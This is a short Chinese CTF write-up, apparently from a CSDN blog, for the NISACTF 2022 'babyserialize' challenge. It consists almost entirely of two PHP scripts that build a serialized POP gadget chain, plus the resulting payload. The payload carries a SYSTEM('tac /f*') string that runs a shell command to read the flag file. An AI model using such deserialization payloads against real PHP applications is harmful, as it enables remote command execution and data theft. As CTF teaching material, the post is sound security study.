1.题目
2.exp
两种
第一种:
<?php
header("Content-Type:text/html;charset=utf-8");
class NISA{
public $fun;
public $txw4ever='SYSTEM("tac /f*");';
}
class TianXiWei{
public $ext;
public $x;
}
class Ilovetxw{
public $huang;
public $su;
}
class four {
public $a;
public $fun;
}
$p = new TianXiWei();
$p->ext=new Ilovetxw;
$p->ext->huang=new four;
$p->ext->huang->a=new Ilovetxw;
$p->ext->huang->a->su=new NISA;
echo urldecode(serialize($p));
?>第二种:
class NISA{
public $txw4ever='SYSTEM("cat /f*");';
}
class Ilovetxw{
}
$a = new NISA();
$a->fun = new Ilovetxw();
$a->fun->su = $a;
$a = serialize($a);
echo $a;
3.payload
O:9:"TianXiWei":2:{s:3:"ext";O:8:"Ilovetxw":2:{s:5:"huang";O:4:"four":2:{s:1:"a";O:8:"Ilovetxw":2:{s:5:"huang";N;s:2:"su";O:4:"NISA":2:{s:3:"fun";N;s:8:"txw4ever";s:18:"SYSTEM("tac /f*");";}}s:3:"fun";N;}s:2:"su";N;}s:1:"x";N;}然后进行get传参
成功!!!
标签:2022,NISA,Ilovetxw,su,ext,babyserialize,huang,new,NISACTF From: https://blog.csdn.net/2302_82243198/article/details/143337611